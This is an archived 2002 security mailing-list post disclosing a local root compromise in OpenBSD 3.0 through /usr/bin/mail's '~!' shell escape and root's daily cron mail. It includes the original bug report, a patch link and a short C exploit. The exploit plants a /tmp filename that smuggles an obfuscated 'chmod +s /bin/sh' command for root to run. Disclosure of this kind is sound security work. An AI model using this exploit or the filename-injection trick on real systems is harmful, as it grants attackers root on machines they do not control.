local root compromise in openbsd 3.0 and below

From: Przemyslaw Frasunek (venglinat_private)
Date: Thu Apr 11 2002 - 04:29:28 PDT

  • Next message: Milos Urbanek: "OpenBSD Local Root Compromise" 

    There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
2002). 

Full problem report and exploit below. FreeBSD is not vulnerable.

----- Forwarded message from urbanekat_private -----

From: urbanekat_private
To: gnatsat_private
Subject: user/2536: possible root compromise using /usr/bin/mail 

>Number:         2536
>Category:       user
>Synopsis:       crontab entry allows possible arbitrary comand execution
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    bugs
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Mon Apr  8 13:30:02 MDT 2002
>Last-Modified:
>Originator:     Milos Urbanek
>Organization:

>Release:        all relases including CURRENT
>Environment:
	
	System      : OpenBSD 3.0
	Architecture: OpenBSD.i386
	Machine     : i386
>Description:

        program /usr/bin/mail allows a special escape sequence to
        be specified in the body of an email; this escape sequence
        specifies a shell comand to be executed

        as mentioned in mail(1):

~!command
             Execute the indicated shell command, then return to the message.


        Problem:
        default root crontab entry looks like:

        # do daily/weekly/monthly maintenance
# on monday only (techie)
30      1       *       *       1       /bin/sh /etc/daily 2>&1 | tee /var/log/d
aily.out | mail -s "`/bin/hostname` daily output" root
30      3       *       *       6       /bin/sh /etc/weekly 2>&1 | tee /var/log/
weekly.out | mail -s "`/bin/hostname` weekly output" root
30      5       1       *       *       /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root


        If there is something in files /etc/daily, /etc/weekly or /etc/monthly
        which could enable the attacker to insert its own input,
        like a malformed filename

         chiba:5$ touch \~!haha
         chiba:6$ ls -al *haha*
        -rw-r--r--  1 milos  milos  0 Apr  8 19:30 ~!haha

        or by other means like output from log files under /var/log,

        the attacker can execute arbitrary comand running under root
        privileges which can lead to the root compromise.


>How-To-Repeat:
        read the man page, and see above
[...]

----- End forwarded message -----

Patch: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24

Exploit:

/*
 * (c) 2002 venglinat_private
 *
 * OpenBSD 3.0 (before 08 Apr 2002)
 * /etc/security + /usr/bin/mail local root exploit
 *
 * Run the exploit and wait for /etc/daily executed from crontab.
 * /bin/sh will be suid root next day morning.
 *
 * Credit goes to urbanekat_private for discovering vulnerability.
 *
 */

#include <fcntl.h>

int main(void)
{
	int fd;

	chdir("/tmp");
	fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);

	if (fd) 
		close(fd);
}

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *

    This archive was generated by hypermail 2b30 : Thu Apr 11 2002 - 14:05:45 PDT